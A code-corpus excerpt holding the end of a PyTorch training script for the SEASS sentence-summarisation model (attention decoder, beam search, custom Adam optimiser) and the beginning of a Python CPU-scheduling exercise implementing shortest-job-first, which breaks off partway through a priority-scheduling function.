h_1_i\n if i + 1 != self.num_layers:\n input = self.dropout(input)\n h_1 += [h_1_i]\n\n h_1 = torch.stack(h_1)\n\n return input, h_1\n\n\nclass MaxOut(nn.Module):\n def __init__(self, pool_size):\n super(MaxOut, self).__init__()\n self.pool_size = pool_size\n\n def forward(self, input):\n \"\"\"\n input:\n reduce_size:\n \"\"\"\n input_size = list(input.size())\n assert input_size[-1] % self.pool_size == 0\n output_size = [d for d in input_size]\n output_size[-1] = output_size[-1] // self.pool_size\n output_size.append(self.pool_size)\n last_dim = len(output_size) - 1\n input = input.view(*output_size)\n input, idx = input.max(last_dim, keepdim=True)\n output = input.squeeze(last_dim)\n\n return output\n\n def __repr__(self):\n return self.__class__.__name__ + '({0})'.format(self.pool_size)\n\n\nclass ConcatAttention(nn.Module):\n def __init__(self, attend_dim, query_dim, att_dim):\n super(ConcatAttention, self).__init__()\n self.attend_dim = attend_dim\n self.query_dim = query_dim\n self.att_dim = att_dim\n self.linear_pre = nn.Linear(attend_dim, att_dim, bias=True)\n self.linear_q = nn.Linear(query_dim, att_dim, bias=False)\n self.linear_v = nn.Linear(att_dim, 1, bias=False)\n self.sm = nn.Softmax()\n self.tanh = nn.Tanh()\n self.mask = None\n\n def applyMask(self, mask):\n self.mask = mask\n\n def forward(self, input, context, precompute=None):\n \"\"\"\n input: batch x dim\n context: batch x sourceL x dim\n \"\"\"\n if precompute is None:\n precompute00 = self.linear_pre(context.contiguous().view(-1, context.size(2)))\n precompute = precompute00.view(context.size(0), context.size(1), -1) # batch x sourceL x att_dim\n targetT = self.linear_q(input).unsqueeze(1) # batch x 1 x att_dim\n\n tmp10 = precompute + targetT.expand_as(precompute) # batch x sourceL x att_dim\n tmp20 = self.tanh(tmp10) # batch x sourceL x att_dim\n energy = self.linear_v(tmp20.view(-1, tmp20.size(2))).view(tmp20.size(0), tmp20.size(1)) # batch x sourceL\n if self.mask is not None:\n # energy.data.masked_fill_(self.mask, -float('inf'))\n # energy.masked_fill_(self.mask, -float('inf')) # TODO: might be wrong\n energy = energy * (1 - self.mask) + self.mask * (-1000000)\n score = self.sm(energy)\n score_m = score.view(score.size(0), 1, score.size(1)) # batch x 1 x sourceL\n\n weightedContext = torch.bmm(score_m, context).squeeze(1) # batch x dim\n\n return weightedContext, score, precompute\n\n def __repr__(self):\n return self.__class__.__name__ + '(' + str(self.att_dim) + ' * ' + '(' \\\n + str(self.attend_dim) + '->' + str(self.att_dim) + ' + ' \\\n + str(self.query_dim) + '->' + str(self.att_dim) + ')' + ')'\n\n\nclass Decoder(nn.Module):\n def __init__(self, opt, dicts):\n self.opt = opt\n self.layers = opt.layers\n self.input_feed = opt.input_feed\n input_size = opt.word_vec_size\n if self.input_feed:\n input_size += opt.enc_rnn_size\n\n super(Decoder, self).__init__()\n self.word_lut = nn.Embedding(dicts.size(),\n opt.word_vec_size,\n padding_idx=PAD)\n self.rnn = StackedGRU(opt.layers, input_size, opt.dec_rnn_size, opt.dropout)\n self.attn = ConcatAttention(opt.enc_rnn_size, opt.dec_rnn_size, opt.att_vec_size)\n self.dropout = nn.Dropout(opt.dropout)\n self.readout = nn.Linear((opt.enc_rnn_size + opt.dec_rnn_size + opt.word_vec_size), opt.dec_rnn_size)\n self.maxout = MaxOut(opt.maxout_pool_size)\n self.maxout_pool_size = opt.maxout_pool_size\n\n self.hidden_size = opt.dec_rnn_size\n\n def load_pretrained_vectors(self, opt):\n if opt.pre_word_vecs_dec is not None:\n pretrained = torch.load(opt.pre_word_vecs_dec)\n self.word_lut.weight.data.copy_(pretrained)\n\n def forward(self, input, hidden, context, src_pad_mask, init_att):\n emb = self.word_lut(input)\n\n g_outputs = []\n cur_context = init_att\n self.attn.applyMask(src_pad_mask)\n precompute = None\n for emb_t in emb.split(1):\n emb_t = emb_t.squeeze(0)\n input_emb = emb_t\n if self.input_feed:\n input_emb = torch.cat([emb_t, cur_context], 1)\n output, hidden = self.rnn(input_emb, hidden)\n cur_context, attn, precompute = self.attn(output, context.transpose(0, 1), precompute)\n\n readout = self.readout(torch.cat((emb_t, output, cur_context), dim=1))\n maxout = self.maxout(readout)\n output = self.dropout(maxout)\n g_outputs += [output]\n g_outputs = torch.stack(g_outputs)\n return g_outputs, hidden, attn, cur_context\n\n\nclass DecInit(nn.Module):\n def __init__(self, opt):\n super(DecInit, self).__init__()\n self.num_directions = 2 if opt.brnn else 1\n assert opt.enc_rnn_size % self.num_directions == 0\n self.enc_rnn_size = opt.enc_rnn_size\n self.dec_rnn_size = opt.dec_rnn_size\n self.initer = nn.Linear(self.enc_rnn_size // self.num_directions, self.dec_rnn_size)\n self.tanh = nn.Tanh()\n\n def forward(self, last_enc_h):\n # batchSize = last_enc_h.size(0)\n # dim = last_enc_h.size(1)\n return self.tanh(self.initer(last_enc_h))\n\n\nclass NMTModel(nn.Module):\n def __init__(self, encoder, decoder, decIniter):\n super(NMTModel, self).__init__()\n self.encoder = encoder\n self.decoder = decoder\n self.decIniter = decIniter\n\n def make_init_att(self, context):\n batch_size = context.size(1)\n h_size = (batch_size, self.encoder.hidden_size * self.encoder.num_directions)\n return Variable(context.data.new(*h_size).zero_(), requires_grad=False)\n\n def forward(self, input):\n \"\"\"\n input: (wrap(srcBatch), wrap(srcBioBatch), lengths), (wrap(tgtBatch), wrap(copySwitchBatch), wrap(copyTgtBatch))\n \"\"\"\n # ipdb.set_trace()\n src = input[0]\n tgt = input[1][0][:-1] # exclude last target from inputs\n src_pad_mask = Variable(src[0].data.eq(PAD).transpose(0, 1).float(), requires_grad=False,\n volatile=False)\n enc_hidden, context = self.encoder(src)\n\n init_att = self.make_init_att(context)\n enc_hidden = self.decIniter(enc_hidden[1]).unsqueeze(0) # [1] is the last backward hiden\n\n g_out, dec_hidden, _attn, _attention_vector = self.decoder(tgt, enc_hidden, context, src_pad_mask, init_att)\n\n return g_out\n\n\nclass Dataset(object):\n def __init__(self, srcData, tgtData, batchSize, cuda, volatile=False):\n self.src = srcData\n if tgtData:\n self.tgt = tgtData\n assert (len(self.src) == len(self.tgt))\n else:\n self.tgt = None\n self.cuda = cuda\n\n self.batchSize = batchSize\n self.numBatches = math.ceil(len(self.src) / batchSize)\n self.volatile = volatile\n\n def _batchify(self, data, align_right=False, include_lengths=False):\n lengths = [x.size(0) for x in data]\n max_length = max(lengths)\n out = data[0].new(len(data), max_length).fill_(PAD)\n for i in range(len(data)):\n data_length = data[i].size(0)\n offset = max_length - data_length if align_right else 0\n out[i].narrow(0, offset, data_length).copy_(data[i])\n\n if include_lengths:\n return out, lengths\n else:\n return out\n\n def __getitem__(self, index):\n assert index < self.numBatches, \"%d > %d\" % (index, self.numBatches)\n srcBatch, lengths = self._batchify(\n self.src[index * self.batchSize:(index + 1) * self.batchSize],\n align_right=False, include_lengths=True)\n\n if self.tgt:\n tgtBatch = self._batchify(\n self.tgt[index * self.batchSize:(index + 1) * self.batchSize])\n else:\n tgtBatch = None\n\n # within batch sorting by decreasing length for variable length rnns\n indices = range(len(srcBatch))\n if tgtBatch is None:\n batch = zip(indices, srcBatch)\n else:\n batch = zip(indices, srcBatch, tgtBatch)\n # batch = zip(indices, srcBatch) if tgtBatch is None else zip(indices, srcBatch, tgtBatch)\n batch, lengths = zip(*sorted(zip(batch, lengths), key=lambda x: -x[1]))\n if tgtBatch is None:\n indices, srcBatch = zip(*batch)\n else:\n indices, srcBatch, tgtBatch = zip(*batch)\n\n def wrap(b):\n if b is None:\n return b\n b = torch.stack(b, 0).t().contiguous()\n if self.cuda:\n b = b.cuda()\n b = Variable(b, volatile=self.volatile)\n return b\n\n # wrap lengths in a Variable to properly split it in DataParallel\n lengths = torch.LongTensor(lengths).view(1, -1)\n lengths = Variable(lengths, volatile=self.volatile)\n\n return (wrap(srcBatch), lengths), (wrap(tgtBatch),), indices\n\n def __len__(self):\n return self.numBatches\n\n def shuffle(self):\n data = list(zip(self.src, self.tgt))\n self.src, self.tgt = zip(*[data[i] for i in torch.randperm(len(data))])\n\n\nclass Beam(object):\n def __init__(self, size, cuda=False):\n\n self.size = size\n self.done = False\n\n self.tt = torch.cuda if cuda else torch\n\n # The score for each translation on the beam.\n self.scores = self.tt.FloatTensor(size).zero_()\n self.all_scores = []\n self.all_length = []\n\n # The backpointers at each time-step.\n self.prevKs = []\n\n # The outputs at each time-step.\n self.nextYs = [self.tt.LongTensor(size).fill_(PAD)]\n self.nextYs[0][0] = BOS\n\n # The attentions (matrix) for each time.\n self.attn = []\n\n # Get the outputs for the current timestep.\n def getCurrentState(self):\n return self.nextYs[-1]\n\n # Get the backpointers for the current timestep.\n def getCurrentOrigin(self):\n return self.prevKs[-1]\n\n # Given prob over words for every last beam `wordLk` and attention\n # `attnOut`: Compute and update the beam search.\n #\n # Parameters:\n #\n # * `wordLk`- probs of advancing from the last step (K x words)\n # * `attnOut`- attention at the last step\n #\n # Returns: True if beam search is complete.\n def advance(self, wordLk, attnOut):\n numWords = wordLk.size(1)\n\n # self.length += 1 # TODO: some is finished so do not acc length for them\n if len(self.prevKs) > 0:\n finish_index = self.nextYs[-1].eq(EOS)\n if any(finish_index):\n wordLk.masked_fill_(finish_index.unsqueeze(1).expand_as(wordLk), -float('inf'))\n for i in range(self.size):\n if self.nextYs[-1][i] == EOS:\n wordLk[i][EOS] = 0\n # set up the current step length\n cur_length = self.all_length[-1]\n for i in range(self.size):\n cur_length[i] += 0 if self.nextYs[-1][i] == EOS else 1\n\n # Sum the previous scores.\n if len(self.prevKs) > 0:\n prev_score = self.all_scores[-1]\n now_acc_score = wordLk + prev_score.unsqueeze(1).expand_as(wordLk)\n beamLk = now_acc_score / cur_length.unsqueeze(1).expand_as(now_acc_score)\n else:\n self.all_length.append(self.tt.FloatTensor(self.size).fill_(1))\n beamLk = wordLk[0]\n\n flatBeamLk = beamLk.view(-1)\n\n bestScores, bestScoresId = flatBeamLk.topk(self.size, 0, True, True)\n self.scores = bestScores\n\n # bestScoresId is flattened beam x word array, so calculate which\n # word and beam each score came from\n prevK = bestScoresId / numWords\n predict = bestScoresId - prevK * numWords\n\n if len(self.prevKs) > 0:\n self.all_length.append(cur_length.index_select(0, prevK))\n self.all_scores.append(now_acc_score.view(-1).index_select(0, bestScoresId))\n else:\n self.all_scores.append(self.scores)\n\n self.prevKs.append(prevK)\n self.nextYs.append(predict)\n self.attn.append(attnOut.index_select(0, prevK))\n\n # End condition is when every one is EOS.\n if all(self.nextYs[-1].eq(EOS)):\n self.done = True\n\n return self.done\n\n def sortBest(self):\n return torch.sort(self.scores, 0, True)\n\n # Get the score of the best in the beam.\n def getBest(self):\n scores, ids = self.sortBest()\n return scores[1], ids[1]\n\n # Walk back to construct the full hypothesis.\n #\n # Parameters.\n #\n # * `k` - the position in the beam to construct.\n #\n # Returns.\n #\n # 1. The hypothesis\n # 2. The attention at each time step.\n def getHyp(self, k):\n hyp, attn = [], []\n # print(len(self.prevKs), len(self.nextYs), len(self.attn))\n for j in range(len(self.prevKs) - 1, -1, -1):\n hyp.append(self.nextYs[j + 1][k])\n attn.append(self.attn[j][k])\n k = self.prevKs[j][k]\n\n return hyp[::-1], torch.stack(attn[::-1])\n\n\nclass Translator(object):\n def __init__(self, opt, model=None, dataset=None):\n self.opt = opt\n\n if model is None:\n\n checkpoint = torch.load(opt.model)\n\n model_opt = checkpoint['opt']\n self.src_dict = checkpoint['dicts']['src']\n self.tgt_dict = checkpoint['dicts']['tgt']\n\n self.enc_rnn_size = model_opt.enc_rnn_size\n self.dec_rnn_size = model_opt.dec_rnn_size\n encoder = Encoder(model_opt, self.src_dict)\n decoder = Decoder(model_opt, self.tgt_dict)\n decIniter = DecInit(model_opt)\n model = NMTModel(encoder, decoder, decIniter)\n\n generator = nn.Sequential(\n nn.Linear(model_opt.dec_rnn_size // model_opt.maxout_pool_size, self.tgt_dict.size()),\n nn.LogSoftmax())\n\n model.load_state_dict(checkpoint['model'])\n generator.load_state_dict(checkpoint['generator'])\n\n if opt.cuda:\n model.cuda()\n generator.cuda()\n else:\n model.cpu()\n generator.cpu()\n\n model.generator = generator\n else:\n self.src_dict = dataset['dicts']['src']\n self.tgt_dict = dataset['dicts']['tgt']\n\n self.enc_rnn_size = opt.enc_rnn_size\n self.dec_rnn_size = opt.dec_rnn_size\n self.opt.cuda = True if len(opt.gpus) >= 1 else False\n self.opt.n_best = 1\n self.opt.replace_unk = False\n\n self.tt = torch.cuda if opt.cuda else torch\n self.model = model\n self.model.eval()\n\n self.copyCount = 0\n\n def buildData(self, srcBatch, goldBatch):\n srcData = [self.src_dict.convertToIdx(b, UNK_WORD) for b in srcBatch]\n tgtData = None\n if goldBatch:\n tgtData = [self.tgt_dict.convertToIdx(b, UNK_WORD, BOS_WORD, EOS_WORD) for b in goldBatch]\n\n return Dataset(srcData, tgtData, self.opt.batch_size, self.opt.cuda, volatile=True)\n\n def buildTargetTokens(self, pred, src, attn):\n tokens = self.tgt_dict.convertToLabels(pred, EOS)\n tokens = tokens[:-1] # EOS\n if self.opt.replace_unk:\n for i in range(len(tokens)):\n if tokens[i] == UNK_WORD:\n _, maxIndex = attn[i].max(0)\n tokens[i] = src[maxIndex[0]]\n return tokens\n\n def translateBatch(self, srcBatch, tgtBatch):\n batchSize = srcBatch[0].size(1)\n beamSize = self.opt.beam_size\n\n # (1) run the encoder on the src\n encStates, context = self.model.encoder(srcBatch)\n srcBatch = srcBatch[0] # drop the lengths needed for encoder\n\n decStates = self.model.decIniter(encStates[1]) # batch, dec_hidden\n\n # (3) run the decoder to generate sentences, using beam search\n\n # Expand tensors for each beam.\n context = Variable(context.data.repeat(1, beamSize, 1))\n decStates = Variable(decStates.unsqueeze(0).data.repeat(1, beamSize, 1))\n att_vec = self.model.make_init_att(context)\n padMask = Variable(\n srcBatch.data.eq(PAD).transpose(0, 1).unsqueeze(0).repeat(beamSize, 1, 1).float(),\n volatile=True)\n\n beam = [Beam(beamSize, self.opt.cuda) for k in range(batchSize)]\n batchIdx = list(range(batchSize))\n remainingSents = batchSize\n\n for i in range(self.opt.max_sent_length):\n # Prepare decoder input.\n input = torch.stack([b.getCurrentState() for b in beam\n if not b.done]).transpose(0, 1).contiguous().view(1, -1)\n g_outputs, decStates, attn, att_vec = self.model.decoder(\n Variable(input, volatile=True), decStates, context, padMask.view(-1, padMask.size(2)), att_vec)\n\n # g_outputs: 1 x (beam*batch) x numWords\n g_outputs = g_outputs.squeeze(0)\n g_out_prob = self.model.generator.forward(g_outputs)\n\n # batch x beam x numWords\n wordLk = g_out_prob.view(beamSize, remainingSents, -1).transpose(0, 1).contiguous()\n attn = attn.view(beamSize, remainingSents, -1).transpose(0, 1).contiguous()\n\n active = []\n father_idx = []\n for b in range(batchSize):\n if beam[b].done:\n continue\n\n idx = batchIdx[b]\n if not beam[b].advance(wordLk.data[idx], attn.data[idx]):\n active += [b]\n father_idx.append(beam[b].prevKs[-1]) # this is very annoying\n\n if not active:\n break\n\n # to get the real father index\n real_father_idx = []\n for kk, idx in enumerate(father_idx):\n real_father_idx.append(idx * len(father_idx) + kk)\n\n # in this section, the sentences that are still active are\n # compacted so that the decoder is not run on completed sentences\n activeIdx = self.tt.LongTensor([batchIdx[k] for k in active])\n batchIdx = {beam: idx for idx, beam in enumerate(active)}\n\n def updateActive(t, rnnSize):\n # select only the remaining active sentences\n view = t.data.view(-1, remainingSents, rnnSize)\n newSize = list(t.size())\n newSize[-2] = newSize[-2] * len(activeIdx) // remainingSents\n return Variable(view.index_select(1, activeIdx) \\\n .view(*newSize), volatile=True)\n\n decStates = updateActive(decStates, self.dec_rnn_size)\n context = updateActive(context, self.enc_rnn_size)\n att_vec = updateActive(att_vec, self.enc_rnn_size)\n padMask = padMask.index_select(1, Variable(activeIdx, volatile=True))\n\n # set correct state for beam search\n previous_index = torch.stack(real_father_idx).transpose(0, 1).contiguous()\n previous_index = Variable(previous_index, volatile=True)\n decStates = decStates.view(-1, decStates.size(2)).index_select(0, previous_index.view(-1)).view(\n *decStates.size())\n att_vec = att_vec.view(-1, att_vec.size(1)).index_select(0, previous_index.view(-1)).view(*att_vec.size())\n\n remainingSents = len(active)\n\n # (4) package everything up\n allHyp, allScores, allAttn = [], [], []\n n_best = self.opt.n_best\n\n for b in range(batchSize):\n scores, ks = beam[b].sortBest()\n\n allScores += [scores[:n_best]]\n valid_attn = srcBatch.data[:, b].ne(PAD).nonzero().squeeze(1)\n hyps, attn = zip(*[beam[b].getHyp(k) for k in ks[:n_best]])\n attn = [a.index_select(1, valid_attn) for a in attn]\n allHyp += [hyps]\n allAttn += [attn]\n\n return allHyp, allScores, allAttn, None\n\n def translate(self, srcBatch, goldBatch):\n # (1) convert words to indexes\n dataset = self.buildData(srcBatch, goldBatch)\n # (wrap(srcBatch), lengths), (wrap(tgtBatch), ), indices\n src, tgt, indices = dataset[0]\n\n # (2) translate\n pred, predScore, attn, _ = self.translateBatch(src, tgt)\n pred, predScore, attn = list(zip(\n *sorted(zip(pred, predScore, attn, indices),\n key=lambda x: x[-1])))[:-1]\n\n # (3) convert indexes to words\n predBatch = []\n for b in range(src[0].size(1)):\n predBatch.append(\n [self.buildTargetTokens(pred[b][n], srcBatch[b], attn[b][n])\n for n in range(self.opt.n_best)]\n )\n\n return predBatch, predScore, None\n\n\nclass MyAdam(Optimizer):\n \"\"\"Implements Adam algorithm.\n\n It has been proposed in `Adam: A Method for Stochastic Optimization`_.\n\n Arguments:\n params (iterable): iterable of parameters to optimize or dicts defining\n parameter groups\n lr (float, optional): learning rate (default: 1e-3)\n betas (Tuple[float, float], optional): coefficients used for computing\n running averages of gradient and its square (default: (0.9, 0.999))\n eps (float, optional): term added to the denominator to improve\n numerical stability (default: 1e-8)\n weight_decay (float, optional): weight decay (L2 penalty) (default: 0)\n\n .. _Adam\\: A Method for Stochastic Optimization:\n https://arxiv.org/abs/1412.6980\n \"\"\"\n\n def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8,\n weight_decay=0):\n defaults = dict(lr=lr, betas=betas, eps=eps,\n weight_decay=weight_decay)\n super(MyAdam, self).__init__(params, defaults)\n\n def step(self, closure=None):\n \"\"\"Performs a single optimization step.\n\n Arguments:\n closure (callable, optional): A closure that reevaluates the model\n and returns the loss.\n \"\"\"\n loss = None\n if closure is not None:\n loss = closure()\n\n for group in self.param_groups:\n for p in group['params']:\n if p.grad is None:\n continue\n grad = p.grad.data\n state = self.state[p]\n\n # State initialization\n if len(state) == 0:\n state['step'] = 0\n # Exponential moving average of gradient values\n state['exp_avg'] = grad.new().resize_as_(grad).zero_()\n # Exponential moving average of squared gradient values\n state['exp_avg_sq'] = grad.new().resize_as_(grad).zero_()\n\n exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']\n beta1, beta2 = group['betas']\n\n state['step'] += 1\n\n if group['weight_decay'] != 0:\n grad = grad.add(group['weight_decay'], p.data)\n\n # Decay the first and second moment running average coefficient\n exp_avg.mul_(beta1).add_(1 - beta1, grad)\n exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)\n\n bias_correction1 = 1 - beta1 ** state['step']\n bias_correction2 = 1 - beta2 ** state['step']\n denom = exp_avg_sq.sqrt().add_(group['eps'] * math.sqrt(bias_correction2))\n step_size = group['lr'] * math.sqrt(bias_correction2) / bias_correction1\n\n p.data.addcdiv_(-step_size, exp_avg, denom)\n\n return loss\n\n\nclass MyGRU(nn.Module):\n def __init__(self, input_size, hidden_size):\n super(MyGRU, self).__init__()\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.linear_input = nn.Linear(input_size, 3 * hidden_size, bias=True)\n self.linear_hidden = nn.Linear(hidden_size, 3 * hidden_size, bias=False)\n self.sigmoid = nn.Sigmoid()\n self.tanh = nn.Tanh()\n\n def forward(self, input, hidden, mask=None):\n x_W = self.linear_input(input)\n h_U = self.linear_hidden(hidden)\n x_Ws = x_W.split(self.hidden_size, 1)\n h_Us = h_U.split(self.hidden_size, 1)\n r = self.sigmoid(x_Ws[0] + h_Us[0])\n z = self.sigmoid(x_Ws[1] + h_Us[1])\n h1 = self.tanh(x_Ws[2] + r * h_Us[2])\n h = (h1 - hidden) * z + hidden\n if mask:\n h = (h - hidden) * mask.unsqueeze(1).expand_as(hidden) + hidden\n return h\n\n def __repr__(self):\n return self.__class__.__name__ + '({0}, {1})'.format(self.input_size, self.hidden_size)\n\n\nclass Optim(object):\n def set_parameters(self, params):\n self.params = list(params) # careful: params may be a generator\n if self.method == 'sgd':\n self.optimizer = optim.SGD(self.params, lr=self.lr)\n elif self.method == 'adagrad':\n self.optimizer = optim.Adagrad(self.params, lr=self.lr)\n elif self.method == 'adadelta':\n self.optimizer = optim.Adadelta(self.params, lr=self.lr)\n elif self.method == 'adam':\n # self.optimizer = optim.Adam(self.params, lr=self.lr)\n self.optimizer = MyAdam(self.params, lr=self.lr)\n else:\n raise RuntimeError(\"Invalid optim method: \" + self.method)\n\n def __init__(self, method, lr, max_grad_norm, max_weight_value=None, lr_decay=1, start_decay_at=None,\n decay_bad_count=6):\n self.last_ppl = None\n self.lr = lr\n self.max_grad_norm = max_grad_norm\n self.max_weight_value = max_weight_value\n self.method = method\n self.lr_decay = lr_decay\n self.start_decay_at = start_decay_at\n self.start_decay = False\n self.decay_bad_count = decay_bad_count\n self.best_metric = 0\n self.bad_count = 0\n\n def step(self):\n # Compute gradients norm.\n if self.max_grad_norm:\n clip_grad_norm(self.params, self.max_grad_norm)\n self.optimizer.step()\n if self.max_weight_value:\n for p in self.params:\n p.data.clamp_(0 - self.max_weight_value, self.max_weight_value)\n\n # decay learning rate if val perf does not improve or we hit the start_decay_at limit\n def updateLearningRate(self, ppl, epoch):\n # if self.start_decay_at is not None and epoch >= self.start_decay_at:\n # self.start_decay = True\n # if self.last_ppl is not None and ppl > self.last_ppl:\n # self.start_decay = True\n #\n # if self.start_decay:\n # self.lr = self.lr * self.lr_decay\n # print(\"Decaying learning rate to %g\" % self.lr)\n\n # self.last_ppl = ppl\n if ppl >= self.best_metric:\n self.best_metric = ppl\n self.bad_count = 0\n else:\n self.bad_count += 1\n logger.info('Bad_count: {0}\\tCurrent lr: {1}'.format(self.bad_count, self.lr))\n logger.info('Best metric: {0}'.format(self.best_metric))\n\n if self.bad_count >= self.decay_bad_count and self.lr >= 1e-6:\n self.lr = self.lr * self.lr_decay\n logger.info(\"Decaying learning rate to %g\" % self.lr)\n self.bad_count = 0\n self.optimizer.param_groups[0]['lr'] = self.lr\n\n\ndef main():\n seq_length = opt.max_sent_length\n shuffle = 1 if opt.process_shuffle else 0\n dataset = prepare_data_online(opt.train_src, opt.src_vocab, opt.train_tgt, opt.tgt_vocab)\n\n trainData = Dataset(dataset['train']['src'], dataset['train']['tgt'], opt.batch_size, opt.gpus)\n dicts = dataset['dicts']\n logger.info(' * vocabulary size. source = %d; target = %d' %\n (dicts['src'].size(), dicts['tgt'].size()))\n logger.info(' * number of training sentences. %d' %\n len(dataset['train']['src']))\n logger.info(' * maximum batch size. %d' % opt.batch_size)\n\n logger.info('Building model...')\n\n encoder = Encoder(opt, dicts['src'])\n decoder = Decoder(opt, dicts['tgt'])\n decIniter = DecInit(opt)\n\n generator = nn.Sequential(\n nn.Linear(opt.dec_rnn_size // opt.maxout_pool_size, dicts['tgt'].size()), # TODO: fix here\n nn.LogSoftmax())\n\n model = NMTModel(encoder, decoder, decIniter)\n model.generator = generator\n translator = Translator(opt, model, dataset)\n\n if len(opt.gpus) >= 1:\n model.cuda()\n generator.cuda()\n else:\n model.cpu()\n generator.cpu()\n\n for pr_name, p in model.named_parameters():\n logger.info(pr_name)\n # p.data.uniform_(-opt.param_init, opt.param_init)\n if p.dim() == 1:\n # p.data.zero_()\n p.data.normal_(0, math.sqrt(6 / (1 + p.size(0))))\n else:\n xavier_normal(p, math.sqrt(3))\n # xavier_uniform(p)\n\n encoder.load_pretrained_vectors(opt)\n decoder.load_pretrained_vectors(opt)\n\n optim = Optim(\n opt.optim, opt.learning_rate,\n max_grad_norm=opt.max_grad_norm,\n max_weight_value=opt.max_weight_value,\n lr_decay=opt.learning_rate_decay,\n start_decay_at=opt.start_decay_at,\n decay_bad_count=opt.halve_lr_bad_count\n )\n\n optim.set_parameters(model.parameters())\n\n validData = None\n if opt.dev_input_src and opt.dev_ref:\n validData = load_dev_data(translator, opt.dev_input_src, opt.dev_ref)\n trainModel(model, translator, trainData, validData, dataset, optim)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"SEASS/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":75335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"596622323","text":"import operator\r\ndef priority(elem):\r\n return elem[3]\r\ndef arrivaltime(elem):\r\n return elem[1]\r\ndef BurstTime(elem):\r\n return elem[2]\r\n\r\n################################################ Non-Preemptive SJF #################################\r\nclass SJF:\r\n\r\n def processData(self, no_of_processes):\r\n process_data = []\r\n for i in range(no_of_processes):\r\n temporary = []\r\n process_id = int(input(\"Enter Process ID: \"))\r\n\r\n arrival_time = int(input(f\"Enter Arrival Time for Process {process_id}: \"))\r\n\r\n burst_time = int(input(f\"Enter Burst Time for Process {process_id}: \"))\r\n temporary.extend([process_id, arrival_time, burst_time, 0])\r\n '''\r\n '0' is the state of the process. 0 means not executed and 1 means execution complete\r\n '''\r\n process_data.append(temporary)\r\n SJF.schedulingProcess(self, process_data)\r\n\r\n def schedulingProcess(self, process_data):\r\n start_time = []\r\n exit_time = []\r\n s_time = 0\r\n process_data.sort(key=lambda x: x[1])\r\n '''\r\n Sort processes according to the Arrival Time\r\n '''\r\n for i in range(len(process_data)):\r\n ready_queue = []\r\n temp = []\r\n normal_queue = []\r\n '''\r\n # if current time less than or equal arrival time of the process put it in the ready queue \r\n else put it in the normal queue\r\n '''\r\n\r\n for j in range(len(process_data)):\r\n if (process_data[j][1] <= s_time) and (process_data[j][3] == 0):\r\n temp.extend([process_data[j][0], process_data[j][1], process_data[j][2]])\r\n ready_queue.append(temp)\r\n temp = []\r\n elif process_data[j][3] == 0:\r\n temp.extend([process_data[j][0], process_data[j][1], process_data[j][2]])\r\n normal_queue.append(temp)\r\n temp = [] #\r\n\r\n if len(ready_queue) != 0:\r\n ready_queue.sort(key=lambda x: x[2])\r\n '''\r\n Sort the processes according to the Burst Time\r\n '''\r\n start_time.append(s_time)\r\n s_time = s_time + ready_queue[0][2]\r\n e_time = s_time\r\n exit_time.append(e_time)\r\n for k in range(len(process_data)):\r\n if process_data[k][0] == ready_queue[0][0]:\r\n break\r\n process_data[k][3] = 1\r\n process_data[k].append(e_time)\r\n\r\n elif len(ready_queue) == 0:\r\n if s_time < normal_queue[0][1]:\r\n s_time = normal_queue[0][1]\r\n start_time.append(s_time)\r\n s_time = s_time + normal_queue[0][2]\r\n e_time = s_time\r\n exit_time.append(e_time)\r\n for k in range(len(process_data)): # lw process excuted change status from 0 to 1\r\n if process_data[k][0] == normal_queue[0][0]:\r\n break\r\n process_data[k][3] = 1\r\n process_data[k].append(e_time)\r\n\r\n t_time = SJF.calculateTurnaroundTime(self, process_data)\r\n w_time = SJF.calculateWaitingTime(self, process_data)\r\n SJF.printData(self, process_data, t_time, w_time)\r\n\r\n def calculateTurnaroundTime(self, process_data):\r\n total_turnaround_time = 0\r\n for i in range(len(process_data)):\r\n turnaround_time = process_data[i][4] - process_data[i][1]\r\n '''\r\n turnaround_time = completion_time - arrival_time\r\n '''\r\n total_turnaround_time = total_turnaround_time + turnaround_time\r\n process_data[i].append(turnaround_time)\r\n average_turnaround_time = total_turnaround_time / len(process_data)\r\n '''\r\n average_turnaround_time = total_turnaround_time / no_of_processes\r\n '''\r\n return average_turnaround_time\r\n\r\n def calculateWaitingTime(self, process_data):\r\n total_waiting_time = 0\r\n for i in range(len(process_data)):\r\n waiting_time = process_data[i][5] - process_data[i][2]\r\n '''\r\n waiting_time = turnaround_time - burst_time\r\n '''\r\n total_waiting_time = total_waiting_time + waiting_time\r\n process_data[i].append(waiting_time)\r\n average_waiting_time = total_waiting_time / len(process_data)\r\n '''\r\n average_waiting_time = total_waiting_time / no_of_processes\r\n '''\r\n return average_waiting_time\r\n\r\n '''\r\n def printData(self, process_data, average_turnaround_time, average_waiting_time):\r\n process_data.sort(key=lambda x: x[4])\r\n Sort processes according to the Process completation time\r\n headers = [\"Process ID\", \"Arrival Time\", \"Burest Time\", \"Completed\", \"Completation Time\", \"Turnaround_Time\", \"Waiting_Time\"]\r\n print(tabulate(process_data, headers=headers))\r\n print(f'Average Turnaround Time: {average_turnaround_time}')\r\n print(f'Average Waiting Time: {average_waiting_time}')\r\n '''\r\n\r\n def printData(self, process_data, average_turnaround_time, average_waiting_time):\r\n process_data.sort(key=lambda x: x[0])\r\n '''\r\n Sort processes according to the Process ID\r\n '''\r\n print(\"Process_ID Arrival_Time Burst_Time Completed Completion_Time Turnaround_Time Waiting_Time\")\r\n\r\n for i in range(len(process_data)):\r\n for j in range(len(process_data[i])):\r\n print(process_data[i][j], end=\"\t\t\t\t\")\r\n print()\r\n\r\n #print(f'Average Turnaround Time: {average_turnaround_time}')\r\n\r\n print(f'Average Waiting Time: {average_waiting_time}')\r\n################################################ preemptive priority #################################\r\nMat = []\r\nglobal prearrival\r\nprearrival = []\r\nglobal current_running\r\ncurrent_running = []\r\ntemp = []\r\ndef PrioprocessCreate(processesNumber):\r\n number_of_columns = 4 # number of columns of matrix\r\n for i in range(0, processesNumber):\r\n temp.append([]) # Create rows in list , row for each process\r\n for i in range(0, processesNumber):\r\n for j in range(0, number_of_columns):\r\n temp[i].append(j)\r\n temp[i][j] = 0\r\n for i in range(0, processesNumber):\r\n Mat.append([]) # Create rows in list , row for each process\r\n for i in range(0, processesNumber):\r\n for j in range(0, 